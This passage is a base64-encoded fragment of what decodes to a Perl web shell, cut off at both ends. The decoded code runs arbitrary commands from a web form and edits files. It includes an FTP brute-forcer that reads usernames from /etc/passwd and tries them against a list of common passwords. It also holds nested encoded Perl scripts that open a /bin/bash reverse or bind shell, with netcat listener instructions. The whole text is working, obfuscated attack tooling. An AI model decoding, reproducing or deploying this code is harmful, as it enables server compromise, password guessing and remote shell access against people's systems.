1BhZ2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlDQojIGNvbW1hbmQgYW5kIGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBhbm90aGVyIGNvbW1hbmQuIFRoZSBjaGFuZ2UgZGlyZWN0b3J5DQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4NCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQ0KIyBvdXRwdXQgb2YgdGhlIGNoYW5nZSBkaXJlY3RvcnkgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkIHRvIHRoZSB1c2Vycw0KIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBFeGVjdXRlQ29tbWFuZA0Kew0KCW15ICRyZXN1bHQ9IiI7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4kQ21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSRyZXN1bHQgLj0gJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoNCgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZCA8L3J1bj48YnI+PHRleHRhcmVhIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7DQoJCSMgeHVhdCB0aG9uZyB0aW4ga2hpIGNodXllbiBkZW4gMSB0aHUgbXVjIG5hbyBkbyENCgkJJFJ1bkNvbW1hbmQ9ICRXaW5OVD8iZGlyIjoiZGlyIC1saWEiOw0KCQkkcmVzdWx0IC49ICZSdW5DbWQ7DQoJfWVsc2lmKCRSdW5Db21tYW5kID1+IG0vXlxzKmVkaXRccysoLispLykNCgl7DQoJCSRyZXN1bHQgLj0gICZTYXZlRmlsZUZvcm07DQoJfWVsc2UNCgl7DQoJCSRyZXN1bHQgLj0gJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSRyZXN1bHQgLj0gIkNvbW1hbmQ6IDxydW4+JFJ1bkNvbW1hbmQ8L3J1bj48YnI+PHRleHRhcmVhIGlkPSdkYXRhJyBjb2xzPSckY29scycgcm93cz0nJHJvd3MnIHNwZWxsY2hlY2s9J2ZhbHNlJz4iOw0KCQkkcmVzdWx0IC49JlJ1bkNtZDsNCgl9DQoJJHJlc3VsdCAuPSAgIjwvdGV4dGFyZWE+IjsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBydW4gY29tbWFuZA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQpzdWIgUnVuQ21kDQp7DQoJbXkgJHJlc3VsdD0iIjsNCgkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7DQoJaWYoISRXaW5OVCkNCgl7DQoJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7DQoJCWFsYXJtKCRDb21tYW5kVGltZW91dER1cmF0aW9uKTsNCgl9DQoJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZA0KCXsNCgkJJHw9MTsNCgkJJENvbW1hbmQgLj0gIiB8IjsNCgkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCXdoaWxlKDxDb21tYW5kT3V0cHV0PikNCgkJew0KCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkkcmVzdWx0IC49ICZIdG1sU3BlY2lhbENoYXJzKCIkX1xuIik7DQoJCX0NCgkJJHw9MDsNCgl9DQoJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzDQoJew0KCQkkcmVzdWx0IC49ICZIdG1sU3BlY2lhbENoYXJzKCckQ29tbWFuZCcpOw0KCX0NCglpZighJFdpbk5UKQ0KCXsNCgkJYWxhcm0oMCk7DQoJfQ0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KIyBGb3JtIFNhdmUgRmlsZSANCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCnN1YiBTYXZlRmlsZUZvcm0NCnsNCglteSAkcmVzdWx0ID0iIjsNCglzdWJzdHIoJFJ1bkNvbW1hbmQsMCw1KT0iIjsNCglteSAkZmlsZT0mdHJpbSgkUnVuQ29tbWFuZCk7DQoJJHNhdmU9Jzxicj48aW5wdXQgbmFtZT0iYSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0ic2F2ZSIgY2xhc3M9InN1Ym1pdCIgPic7DQoJJEZpbGU9JEN1cnJlbnREaXIuJFBhdGhTZXAuJFJ1bkNvbW1hbmQ7DQoJbXkgJGRpcj0iPHNwYW4gc3R5bGU9J2ZvbnQ6IDExcHQgVmVyZGFuYTsgZm9udC13ZWlnaHQ6IGJvbGQ7Jz4iLiZBZGRMaW5rRGlyKCJndWkiKS4iPC9zcGFuPiI7DQoJaWYoLXcgJEZpbGUpDQoJew0KCQkkcm93cz0iMjMiDQoJfWVsc2UNCgl7DQoJCSRtc2c9Ijxicj48Zm9udCBzdHlsZT0nZm9udDogMTVwdCBWZXJkYW5hOyBjb2xvcjogeWVsbG93OycgPiBQZXJtaXNzaW9uIGRlbmllZCE8Zm9udD48YnI+IjsNCgkJJHJvd3M9IjIwIg0KCX0NCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRkaXIgPiAiIDogIjxmb250IGNvbG9yPScjRkZGRkZGJz5bYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQ8L2ZvbnQ+ICI7DQoJJHJlYWQ9KCRXaW5OVCk/InR5cGUiOiJsZXNzIjsNCgkkUnVuQ29tbWFuZCA9ICIkcmVhZCBcIiRSdW5Db21tYW5kXCIiOw0KCSRyZXN1bHQgLj0gIDw8RU5EOw0KCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KDQoJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCgkkUHJvbXB0DQoJPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjQwIiBuYW1lPSJjIj4NCgk8aW5wdXQgbmFtZT0icyIgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPg0KCTxicj5Db21tYW5kOiA8cnVuPiAkUnVuQ29tbWFuZCA8L3J1bj4NCgk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJmaWxlIiB2YWx1ZT0iJGZpbGUiID4gJHNhdmUgPGJyPiAkbXNnDQoJPGJyPjx0ZXh0YXJlYSBpZD0iZGF0YSIgbmFtZT0iZGF0YSIgY29scz0iJGNvbHMiIHJvd3M9IiRyb3dzIiBzcGVsbGNoZWNrPSJmYWxzZSI+DQpFTkQNCgkNCgkkcmVzdWx0IC49ICZSdW5DbWQ7DQoJJHJlc3VsdCAuPSAgIjwvdGV4dGFyZWE+IjsNCgkkcmVzdWx0IC49ICAiPC9mb3JtPiI7DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQojIFNhdmUgRmlsZQ0KIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0Kc3ViIFNhdmVGaWxlKCQpDQp7DQoJbXkgJERhdGE9IHNoaWZ0IDsNCglteSAkRmlsZT0gc2hpZnQ7DQoJJEZpbGU9JEN1cnJlbnREaXIuJFBhdGhTZXAuJEZpbGU7DQoJaWYob3BlbihGSUxFLCAiPiRGaWxlIikpDQoJew0KCQliaW5tb2RlIEZJTEU7DQoJCXByaW50IEZJTEUgJERhdGE7DQoJCWNsb3NlIEZJTEU7DQoJCXJldHVybiAxOw0KCX1lbHNlDQoJew0KCQlyZXR1cm4gMDsNCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEJydXRlIEZvcmNlciBGb3JtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQnJ1dGVGb3JjZXJGb3JtDQp7DQoJbXkgJHJlc3VsdD0iIjsNCgkkcmVzdWx0IC49IDw8RU5EOw0KDQo8dGFibGU+DQoNCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBhbGlnbj0iY2VudGVyIj4NCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIzxicj4NClNpbXBsZSBGVFAgYnJ1dGUgZm9yY2VyPGJyPg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQo8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImJydXRlZm9yY2VyIi8+DQo8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD5Vc2VyOjxicj48dGV4dGFyZWEgcm93cz0iMTgiIGNvbHM9IjMwIiBuYW1lPSJ1c2VyIj4NCkVORA0KY2hvcCgkcmVzdWx0IC49IGBsZXNzIC9ldGMvcGFzc3dkIHwgY3V0IC1kOiAtZjFgKTsNCiRyZXN1bHQgLj0gPDwnRU5EJzsNCjwvdGV4dGFyZWE+PC90ZD4NCjx0ZD4NCg0KUGFzczo8YnI+DQo8dGV4dGFyZWEgcm93cz0iMTgiIGNvbHM9IjMwIiBuYW1lPSJwYXNzIj4xMjNwYXNzDQoxMjMhQCMNCjEyM2FkbWluDQoxMjNhYmMNCjEyMzQ1NmFkbWluDQoxMjM0NTU0MzIxDQoxMjM0NDMyMQ0KcGFzczEyMw0KYWRtaW4NCmFkbWluY3ANCmFkbWluaXN0cmF0b3INCm1hdGtoYXUNCnBhc3NhZG1pbg0KcEBzc3dvcmQNCnBAc3N3MHJkDQpwYXNzd29yZA0KMTIzNDU2DQoxMjM0NTY3DQoxMjM0NTY3OA0KMTIzNDU2Nzg5DQoxMjM0NTY3ODkwDQoxMTExMTENCjAwMDAwMA0KMjIyMjIyDQozMzMzMzMNCjQ0NDQ0NA0KNTU1NTU1DQo2NjY2NjYNCjc3Nzc3Nw0KODg4ODg4DQo5OTk5OTkNCjEyMzEyMw0KMjM0MjM0DQozNDUzNDUNCjQ1NjQ1Ng0KNTY3NTY3DQo2Nzg2NzgNCjc4OTc4OQ0KMTIzMzIxDQo0NTY2NTQNCjY1NDMyMQ0KNzY1NDMyMQ0KODc2NTQzMjENCjk4NzY1NDMyMQ0KMDk4NzY1NDMyMQ0KYWRtaW4xMjMNCmFkbWluMTIzNDU2DQphYmNkZWYNCmFiY2FiYw0KIUAjIUAjDQohQCMkJV4NCiFAIyQlXiYqKA0KIUAjJCQjQCENCmFiYzEyMw0KYW5oeWV1ZW0NCmlsb3ZleW91PC90ZXh0YXJlYT4NCjwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPg0KU2xlZXA6PHNlbGVjdCBuYW1lPSJzbGVlcCI+DQoNCjxvcHRpb24+MDwvb3B0aW9uPg0KPG9wdGlvbj4xPC9vcHRpb24+DQo8b3B0aW9uPjI8L29wdGlvbj4NCg0KPG9wdGlvbj4zPC9vcHRpb24+DQo8L3NlbGVjdD4gDQo8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0ic3VibWl0IiB2YWx1ZT0iQnJ1dGUgRm9yY2VyIi8+PC90ZD48L3RyPg0KPC9mb3JtPg0KPC90YWJsZT4NCkVORA0KcmV0dXJuICRyZXN1bHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEJydXRlIEZvcmNlcg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEJydXRlRm9yY2VyDQp7DQoJbXkgJHJlc3VsdD0iIjsNCgkkU2VydmVyPSRFTlZ7J1NFUlZFUl9BRERSJ307DQoJaWYoJGlueyd1c2VyJ30gZXEgIiIpDQoJew0KCQkkcmVzdWx0IC49ICZCcnV0ZUZvcmNlckZvcm07DQoJfWVsc2UNCgl7DQoJCXVzZSBOZXQ6OkZUUDsgDQoJCUB1c2VyPSBzcGxpdCgvXG4vLCAkaW57J3VzZXInfSk7DQoJCUBwYXNzPSBzcGxpdCgvXG4vLCAkaW57J3Bhc3MnfSk7DQoJCWNob21wKEB1c2VyKTsNCgkJY2hvbXAoQHBhc3MpOw0KCQkkcmVzdWx0IC49ICI8YnI+PGJyPlsrXSBUcnlpbmcgYnJ1dGUgJFNlcnZlck5hbWU8YnI+PT09PT09PT09PT09PT09PT09PT0+Pj4+Pj4+Pj4+Pj48PDw8PDw8PDw8PT09PT09PT09PT09PT09PT09PT08YnI+PGJyPlxuIjsNCgkJZm9yZWFjaCAkdXNlcm5hbWUgKEB1c2VyKQ0KCQl7DQoJCQlpZighKCR1c2VybmFtZSBlcSAiIikpDQoJCQl7DQoJCQkJZm9yZWFjaCAkcGFzc3dvcmQgKEBwYXNzKQ0KCQkJCXsNCgkJCQkJJGZ0cCA9IE5ldDo6RlRQLT5uZXcoJFNlcnZlcikgb3IgZGllICJDb3VsZCBub3QgY29ubmVjdCB0byAkU2VydmVyTmFtZVxuIjsgDQoJCQkJCWlmKCRmdHAtPmxvZ2luKCIkdXNlcm5hbWUiLCIkcGFzc3dvcmQiKSkNCgkJCQkJew0KCQkJCQkJJHJlc3VsdCAuPSAiPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9J2Z0cDovLyR1c2VybmFtZTokcGFzc3dvcmRcQCRTZXJ2ZXInPlsrXSBmdHA6Ly8kdXNlcm5hbWU6JHBhc3N3b3JkXEAkU2VydmVyPC9hPjxicj5cbiI7DQoJCQkJCQkkZnRwLT5xdWl0KCk7DQoJCQkJCQlicmVhazsNCgkJCQkJfQ0KCQkJCQlpZighKCRpbnsnc2xlZXAnfSBlcSAiMCIpKQ0KCQkJCQl7DQoJCQkJCQlzbGVlcChpbnQoJGlueydzbGVlcCd9KSk7DQoJCQkJCX0NCgkJCQkJJGZ0cC0+cXVpdCgpOw0KCQkJCX0NCgkJCX0NCgkJfQ0KCQkkcmVzdWx0IC49ICJcbjxicj49PT09PT09PT09Pj4+Pj4+Pj4+PiBGaW5pc2hlZCA8PDw8PDw8PDw8PT09PT09PT09PTxicj5cbiI7DQoJfQ0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBCYWNrY29ubmVjdCBGb3JtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQmFja0JpbmRGb3JtDQp7DQoJcmV0dXJuIDw8RU5EOw0KCTxicj48YnI+DQoNCgk8dGFibGU+DQoJPHRyPg0KCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KCTx0ZD5CYWNrQ29ubmVjdDogPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImJhY2tiaW5kIj48L3RkPg0KCTx0ZD4gSG9zdDogPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjIwIiBuYW1lPSJjbGllbnRhZGRyIiB2YWx1ZT0iJEVOVnsnUkVNT1RFX0FERFInfSI+DQoJIFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSI3IiBuYW1lPSJjbGllbnRwb3J0IiB2YWx1ZT0iODAiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiYScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+PC90ZD4NCg0KCTx0ZD48aW5wdXQgbmFtZT0icyIgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiIHZhbHVlPSJDb25uZWN0Ij48L3RkPg0KCTwvZm9ybT4NCgk8L3RyPg0KCTx0cj4NCgk8dGQgY29sc3Bhbj0zPjxmb250IGNvbG9yPSNGRkZGRkY+WytdIENsaWVudCBsaXN0ZW4gYmVmb3JlIGNvbm5lY3QgYmFjayENCgk8YnI+WytdIFRyeSBjaGVjayB5b3VyIFBvcnQgd2l0aCA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3d3dy5jYW55b3VzZWVtZS5vcmcvIj5odHRwOi8vd3d3LmNhbnlvdXNlZW1lLm9yZy88L2E+DQoJPGJyPlsrXSBDbGllbnQgbGlzdGVuIHdpdGggY29tbWFuZDogPHJ1bj5uYyAtdnYgLWwgLXAgPHNwYW4gaWQ9ImJhIj44MDwvc3Bhbj48L3J1bj48L2ZvbnQ+PC90ZD4NCg0KCTwvdHI+DQoJPC90YWJsZT4NCg0KCTxicj48YnI+DQoJPHRhYmxlPg0KCTx0cj4NCgk8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCgk8dGQ+QmluZCBQb3J0OiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYmFja2JpbmQiPjwvdGQ+DQoNCgk8dGQ+IFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjE0MTIiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+DQoNCgkgUGFzc3dvcmQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbmFtZT0iYmluZHBhc3MiIHZhbHVlPSJUSElFVUdJQUJVT04iPjwvdGQ+DQoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkJpbmQiPjwvdGQ+DQoJPC9mb3JtPg0KCTwvdHI+DQoJPHRyPg0KCTx0ZCBjb2xzcGFuPTM+PGZvbnQgY29sb3I9I0ZGRkZGRj5bK10gQ2h1YyBuYW5nIGNodWEgZGMgdGVzdCENCgk8YnI+WytdIFRyeSBjb21tYW5kOiA8cnVuPm5jICRFTlZ7J1NFUlZFUl9BRERSJ30gPHNwYW4gaWQ9ImJpIj4xNDEyPC9zcGFuPjwvcnVuPjwvZm9udD48L3RkPg0KDQoJPC90cj4NCgk8L3RhYmxlPjxicj4NCkVORA0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBCYWNrY29ubmVjdCB1c2UgcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEJhY2tCaW5kDQp7DQoJdXNlIE1JTUU6OkJhc2U2NDsNCgl1c2UgU29ja2V0OwkNCgkkYmFja3Blcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdTVTg2T2xOdlkydGxkRHNOQ2lSVGFHVnNiQWs5SUNJdlltbHVMMkpoYzJnaU93MEtKRUZTUjBNOVFFRlNSMVk3RFFwMWMyVWdVMjlqYTJWME93MEtkWE5sSUVacGJHVklZVzVrYkdVN0RRcHpiMk5yWlhRb1UwOURTMFZVTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2daMlYwY0hKdmRHOWllVzVoYldVb0luUmpjQ0lwS1NCdmNpQmthV1VnY0hKcGJuUWdJbHN0WFNCVmJtRmliR1VnZEc4Z1VtVnpiMngyWlNCSWIzTjBYRzRpT3cwS1kyOXVibVZqZENoVFQwTkxSVlFzSUhOdlkydGhaR1J5WDJsdUtDUkJVa2RXV3pGZExDQnBibVYwWDJGMGIyNG9KRUZTUjFaYk1GMHBLU2tnYjNJZ1pHbGxJSEJ5YVc1MElDSmJMVjBnVlc1aFlteGxJSFJ2SUVOdmJtNWxZM1FnU0c5emRGeHVJanNOQ25CeWFXNTBJQ0pEYjI1dVpXTjBaV1FoSWpzTkNsTlBRMHRGVkMwK1lYVjBiMlpzZFhOb0tDazdEUXB2Y0dWdUtGTlVSRWxPTENBaVBpWlRUME5MUlZRaUtUc05DbTl3Wlc0b1UxUkVUMVZVTENJK0psTlBRMHRGVkNJcE93MEtiM0JsYmloVFZFUkZVbElzSWo0bVUwOURTMFZVSWlrN0RRcHdjbWx1ZENBaUxTMDlQU0JEYjI1dVpXTjBaV1FnUW1GamEyUnZiM0lnUFQwdExTQWdYRzVjYmlJN0RRcHplWE4wWlcwb0luVnVjMlYwSUVoSlUxUkdTVXhGT3lCMWJuTmxkQ0JUUVZaRlNFbFRWQ0E3WldOb2J5QW5XeXRkSUZONWMzUmxiV2x1Wm04NklDYzdJSFZ1WVcxbElDMWhPMlZqYUc4N1pXTm9ieUFuV3l0ZElGVnpaWEpwYm1adk9pQW5PeUJwWkR0bFkyaHZPMlZqYUc4Z0oxc3JYU0JFYVhKbFkzUnZjbms2SUNjN0lIQjNaRHRsWTJodk95QmxZMmh2SUNkYksxMGdVMmhsYkd3NklDYzdKRk5vWld4c0lpazdEUXBqYkc5elpTQlRUME5MUlZRNyI7DQoJJGJpbmRwZXJsPSJJeUV2ZFhOeUwySnBiaTl3WlhKc0RRcDFjMlVnVTI5amEyVjBPdzBLSkVGU1IwTTlRRUZTUjFZN0RRb2tjRzl5ZEFrOUlDUkJVa2RXV3pCZE93MEtKSEJ5YjNSdkNUMGdaMlYwY0hKdmRHOWllVzVoYldVb0ozUmpjQ2NwT3cwS0pGTm9aV3hzQ1QwZ0lpOWlhVzR2WW1GemFDSTdEUXB6YjJOclpYUW9VMFZTVmtWU0xDQlFSbDlKVGtWVUxDQlRUME5MWDFOVVVrVkJUU3dnSkhCeWIzUnZLVzl5SUdScFpTQWljMjlqYTJWME9pUWhJanNOQ25ObGRITnZZMnR2Y0hRb1UwVlNWa1ZTTENCVFQweGZVMDlEUzBWVUxDQlRUMTlTUlZWVFJVRkVSRklzSUhCaFkyc29JbXdpTENBeEtTbHZjaUJrYVdVZ0luTmxkSE52WTJ0dmNIUTZJQ1FoSWpzTkNtSnBibVFvVTBWU1ZrVlNMQ0J6YjJOcllXUmtjbDlwYmlna2NHOXlkQ3dnU1U1QlJFUlNYMEZPV1NrcGIzSWdaR2xsSUNKaWFXNWtPaUFrSVNJN0RRcHNhWE4wWlc0b1UwVlNWa1ZTTENCVFQwMUJXRU5QVGs0cENRbHZjaUJrYVdVZ0lteHBjM1JsYmpvZ0pDRWlPdzBLWm05eUtEc2dKSEJoWkdSeUlEMGdZV05qWlhCMEtFTk1TVVZPVkN3Z1UwVlNWa1ZTS1RzZ1kyeHZjMlVnUTB4SlJVNVVLUTBLZXcwS0NXOXdaVzRvVTFSRVNVNHNJQ0krSmtOTVNVVk9WQ0lwT3cwS0NXOXdaVzRvVTFSRVQxVlVMQ0FpUGlaRFRFbEZUbFFpS1RzTkNnbHZjR1Z1S0ZOVVJFVlNVaXdnSWo0bVEweEpSVTVVSWlrN0RRb0pjM2x6ZEdWdEtDSjFibk5sZENCSVNWTlVSa2xNUlRzZ2RXNXpaWFFnVTBGV1JVaEpVMVFnTzJWamFHOGdKMXNyWFNCVGVYTjBaVzFwYm1adk9pQW5PeUIxYm1GdFpTQXRZVHRsWTJodk8yVmphRzhnSjFzclhTQlZjMlZ5YVc1bWJ6b2dKenNnYVdRN1pXTm9ienRsWTJodklDZGJLMTBnUkdseVpXTjBiM0o1T2lBbk95QndkMlE3WldOb2J6c2daV05vYnlBbld5dGRJRk5vWld4c09pQW5PeVJUYUdWc2JDSXBPdzBLQ1dOc2IzTmxLRk5VUkVsT0tUc05DZ2xqYkc5elpTaFRWRVJQVlZRcE93MEtDV05zYjNObEtGTlVSRVZTVWlrN0RRcDlEUW89IjsNCg0KCSRDbGllbnRBZGRyID0gJGlueydjbGllbnRhZGRyJ307DQoJJENsaWVudFBvcnQgPSBpbnQoJGlueydjbGllbnRwb3J0J30pOw0KCWlmKCRDbGllbnRQb3J0IGVxIDApDQoJew0KCQlyZXR1cm4gJkJhY2tCaW5kRm9ybTsNCgl9ZWxzaWYoISRDbGllbnRBZGRyIGVxICIiKQ0KCXsNCgkJJERhdGE9ZGVjb2RlX2Jhc2U2NCgkYmFja3BlcmwpOw0KCQlpZigtdyAiL3RtcC8iKQ0KCQl7DQoJCQkkRmlsZT0iL3RtcC9iYWNrY29ubmVjdC5wbCI7CQ0KCQl9ZWxzZQ0KCQl7DQoJCQkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4iYmFja2Nvbm5lY3QucGwiOw0KCQl9DQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOw0KCQlwcmludCBGSUxFICREYXRhOw0KCQljbG9zZSBGSUxFOw0KCQlzeXN0ZW0oInBlcmwgYmFja2Nvbm5lY3QucGwgJENsaWVudEFkZHIgJENsaWVudFBvcnQiKTsNCgkJdW5saW5rKCRGaWxlKTsNCgkJZXhpdCAwOw0KCX1lbHNlDQoJew0KCQkkRGF0YT1kZWNvZGVfYmFzZTY0KCRiaW5kcGVybCk7DQoJCWlmKC13ICIvdG1wIikNCgkJew0KCQkJJEZpbGU9Ii90bXAvYmluZHBvcnQucGwiOwkNCgkJfWVsc2UNCgkJew0KCQkJJEZpbGU9JEN1cnJlbnREaXIuJFBhdGhTZXAuImJpbmRwb3J0LnBsIjsNCgkJfQ0KCQlvcGVuKEZJTEUsICI+JEZpbGUiKTsNCgkJcHJpbnQgRklMRSAkRGF0YTsNCgkJY2xvc2UgRklMRTsNCgkJc3lzdGVtKCJwZXJsIGJpbmRwb3J0LnBsICRDbGllbnRQb3J0Iik7DQoJCXVubGluaygkRmlsZSk7DQoJCWV4aXQgMDsNCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojICBBcnJheSBMaXN0IERpcmVjdG9yeQ0KIy0tLS0tLS0tLS0tLS0tLS0t